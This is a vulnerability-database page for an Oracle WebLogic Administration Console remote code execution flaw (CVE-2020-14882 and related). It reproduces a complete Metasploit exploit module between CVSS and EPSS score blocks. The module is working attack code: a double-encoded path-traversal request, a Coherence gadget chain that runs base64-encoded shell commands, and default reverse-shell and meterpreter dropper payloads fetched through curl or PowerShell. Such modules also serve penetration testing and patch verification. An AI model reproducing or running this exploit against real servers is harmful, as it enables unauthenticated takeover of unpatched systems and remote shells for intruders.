Lucene search

K
zdtMetasploit1337DAY-ID-35287
HistoryNov 19, 2020 - 12:00 a.m.

Oracle WebLogic Server Administration Console Handle Remote Code Execution Exploit

2020-11-1900:00:00
metasploit
0day.today
141

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

This Metasploit module exploits a path traversal and a Java class instantiation in the handle implementation of WebLogic’s Administration Console to execute code as the WebLogic user. Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 are known to be affected. Tested against 12.2.1.3.0 from Vulhub (Linux) and on Windows. Warning! Multiple sessions may be created by exploiting this vuln.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle WebLogic Server Administration Console Handle RCE',
        'Description' => %q{
          This module exploits a path traversal and a Java class instantiation
          in the handle implementation of WebLogic's Administration Console to
          execute code as the WebLogic user.

          Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and
          14.1.1.0.0 are known to be affected.

          Tested against 12.2.1.3.0 from Vulhub (Linux) and on Windows.

          Warning! Multiple sessions may be created by exploiting this vuln.
        },
        'Author' => [
          'voidfyoo', # Discovery
          'Jang', # Analysis and PoC
          'wvu' # Module
        ],
        'References' => [
          ['CVE', '2020-14882'], # Auth bypass?
          ['CVE', '2020-14883'], # RCE?
          ['CVE', '2020-14750'], # Patch bypass
          ['EDB', '48971'], # An exploit
          ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'],
          ['URL', 'https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf']
        ],
        'DisclosureDate' => '2020-10-20', # Vendor advisory
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux', 'win'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :curl,
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            }
          ],
          [
            'Windows Dropper',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :win_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
                'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'
              }
            }
          ],
          [
            'PowerShell Stager',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :psh_stager,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
              }
            }
          ]
        ],
        'DefaultTarget' => 4,
        'DefaultOptions' => {
          'WfsDelay' => 10
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      Opt::RPORT(7001),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = execute_command('')

    unless res
      return CheckCode::Unknown('Target did not respond to check.')
    end

    if res.code == 200 && res.body.include?('Deploying Application')
      raise RuntimeError
    end

    unless res.code == 302 && res.body.include?('UnexpectedExceptionPage')
      return CheckCode::Safe('Path traversal failed.')
    end

    CheckCode::Vulnerable('Path traversal successful.')
  rescue RuntimeError
    vprint_error('Application is deploying, sleeping and retrying check')

    sleep(1)
    retry
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd, :win_cmd
      execute_command(payload.encoded)
    when :linux_dropper, :win_dropper
      execute_cmdstager
    when :psh_stager
      execute_command(cmd_psh_payload(
        payload.encoded,
        payload.arch.first,
        remove_comspec: true
      ))
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}") unless cmd.empty?

    send_request_cgi(
      'method' => 'POST',
      'uri' => aperture_science_handheld_portal_device,
      'vars_post' => {
        'handle' => coherence_gadget_chain(cmd)
      }
    )
  end

  def coherence_gadget_chain(cmd)
    <<~JAVA.tr("\n", '').gsub('  ', '')
      com.tangosol.coherence.mvel2.sh.ShellSession('
        java.lang.Runtime.getRuntime().exec(
          new java.lang.String[] {
            #{win_target? ? '"cmd.exe", "/c", ' : '"/bin/sh", "-c", '}
            new java.lang.String(
              java.util.Base64.getDecoder().decode("#{Rex::Text.encode_base64(cmd)}")
            )
          }
        )
      ')
    JAVA
  end

  def aperture_science_handheld_portal_device
    normalize_uri(target_uri.path, '/console/css/.%252e/console.portal')
  end

  def win_target?
    target.platform.names.first == 'Windows'
  end

end

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%